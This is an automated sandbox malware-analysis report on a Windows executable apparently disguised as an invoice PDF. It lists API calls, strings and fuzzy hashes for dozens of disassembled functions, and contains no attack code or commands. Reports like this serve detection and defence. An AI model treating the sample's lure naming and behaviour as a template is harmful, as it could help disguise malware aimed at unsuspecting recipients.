                                                                              • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                              • String ID: *.*
                                                                              • API String ID: 1153243558-438819550
                                                                              • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                              • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                                                                              • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                              • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00455127
                                                                              • GetMenuItemInfoW.USER32 ref: 00455146
                                                                              • DeleteMenu.USER32(?,?,00000000), ref: 004551B2
                                                                              • DeleteMenu.USER32(?,?,00000000), ref: 004551C8
                                                                              • GetMenuItemCount.USER32(?), ref: 004551D9
                                                                              • SetMenu.USER32(?,00000000), ref: 004551E7
                                                                              • DestroyMenu.USER32(?,?,00000000), ref: 004551F4
                                                                              • DrawMenuBar.USER32 ref: 00455207
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1663942905-4108050209
                                                                              • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                              • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                              • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                              • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 1481289235-0
                                                                              • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                              • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                                                                              • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                              • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                                              APIs
                                                                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                              • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                              • SendMessageW.USER32 ref: 0046FBAF
                                                                              • SendMessageW.USER32 ref: 0046FBE2
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                              • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                              • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                              • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                              • SendMessageW.USER32 ref: 0046FD00
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                              • String ID:
                                                                              • API String ID: 2632138820-0
                                                                              • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                              • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                              • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                              • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                              APIs
                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                                                              • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CursorLoad
                                                                              • String ID:
                                                                              • API String ID: 3238433803-0
                                                                              • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                              • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                                              • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                              • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                                              APIs
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                              • _wcslen.LIBCMT ref: 00460B00
                                                                              • __swprintf.LIBCMT ref: 00460B9E
                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                                              • GetDlgCtrlID.USER32(?), ref: 00460CE6
                                                                              • GetWindowRect.USER32(?,?), ref: 00460D21
                                                                              • GetParent.USER32(?), ref: 00460D40
                                                                              • ScreenToClient.USER32(00000000), ref: 00460D47
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                              • String ID: %s%u
                                                                              • API String ID: 1899580136-679674701
                                                                              • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                              • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                                                                              • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                              • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                                                                              APIs
                                                                              • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                                                              • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: FreeFromStringTask_wcslen$_wcscpy
                                                                              • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                              • API String ID: 2485709727-934586222
                                                                              • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                              • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                                                              • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                              • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                              • String ID: HH
                                                                              • API String ID: 3381189665-2761332787
                                                                              • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                              • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                                              • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                              • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 00434585
                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                              • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                              • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                              • String ID: (
                                                                              • API String ID: 3300687185-3887548279
                                                                              • Opcode ID: ce1659b4de6d99d5d8305987b6ae3bd60ca053271f391386a97d93e81ebaf4af
                                                                              • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                              • Opcode Fuzzy Hash: ce1659b4de6d99d5d8305987b6ae3bd60ca053271f391386a97d93e81ebaf4af
                                                                              • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                                                              APIs
                                                                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                              • __swprintf.LIBCMT ref: 0045E4D9
                                                                              • _printf.LIBCMT ref: 0045E595
                                                                              • _printf.LIBCMT ref: 0045E5B7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString_printf$__swprintf_wcslen
                                                                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                              • API String ID: 3590180749-2894483878
                                                                              • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                              • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                              • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                              • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
                                                                              • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                                              • DeleteObject.GDI32(?), ref: 0046F950
                                                                              • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
                                                                              • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                                              • DeleteObject.GDI32(?), ref: 0046F9CF
                                                                              • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                                              • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                                              • DestroyIcon.USER32(?), ref: 0046FA4F
                                                                              • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                                              • DeleteObject.GDI32(?), ref: 0046FA68
                                                                              • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                              • String ID:
                                                                              • API String ID: 3412594756-0
                                                                              • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                              • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                                              • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                              • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                                              APIs
                                                                                • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                              • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                              • API String ID: 4013263488-4113822522
                                                                              • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                              • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                              • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                              • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                                                              • String ID:
                                                                              • API String ID: 228034949-0
                                                                              • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                              • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                                                                              • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                              • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                              • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                              • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                                                              • DeleteObject.GDI32(?), ref: 00433603
                                                                              • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                              • String ID:
                                                                              • API String ID: 3969911579-0
                                                                              • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                              • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                              • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                              • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                              APIs
                                                                              • GetParent.USER32 ref: 00445A8D
                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                              • __wcsicoll.LIBCMT ref: 00445AC4
                                                                              • __wcsicoll.LIBCMT ref: 00445AE0
                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
